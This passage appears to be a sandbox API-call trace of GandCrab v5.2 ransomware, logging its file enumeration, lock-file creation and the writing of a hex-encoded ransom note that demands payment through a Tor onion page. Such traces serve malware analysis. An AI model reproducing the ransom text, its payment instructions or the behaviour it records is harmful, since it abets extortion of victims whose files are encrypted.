2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0086.045] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0086.046] CloseHandle (hObject=0x2bc) returned 1 [0086.046] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.046] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.046] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1f, wMilliseconds=0x162)) [0086.046] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.047] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0086.047] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0086.047] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\d2ca4a09d2ca4deb61a.lock") returned 71 [0086.047] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\sun\\java\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0086.059] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.059] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.060] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\") returned 47 [0086.060] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\*" [0086.060] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5034f8 [0086.060] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.060] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0086.060] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.060] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.061] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0086.061] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0086.061] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0086.061] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\d2ca4a09d2ca4deb61a.lock" [0086.061] lstrlenW (lpString=".titwmvjl") returned 9 [0086.061] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\d2ca4a09d2ca4deb61a.lock") returned 71 [0086.061] VirtualAlloc (lpAddress=0x0, dwSize=0xce, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.061] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 80 [0086.061] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\d2ca4a09d2ca4deb61a.lock") returned 71 [0086.061] lstrlenW (lpString=".lock") returned 5 [0086.061] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.061] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0086.061] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.061] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.061] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0086.061] lstrcmpW (lpString1="Deployment", lpString2=".") returned 1 [0086.062] lstrcmpW (lpString1="Deployment", lpString2="..") returned 1 [0086.062] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\", lpString2="Deployment" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment" [0086.062] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\" [0086.062] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0086.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.062] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0086.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.062] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0086.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.062] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0086.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.063] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0086.063] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.063] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.063] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\\\TITWMVJL-DECRYPT.txt") returned 79 [0086.063] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\sun\\java\\deployment\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0086.111] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6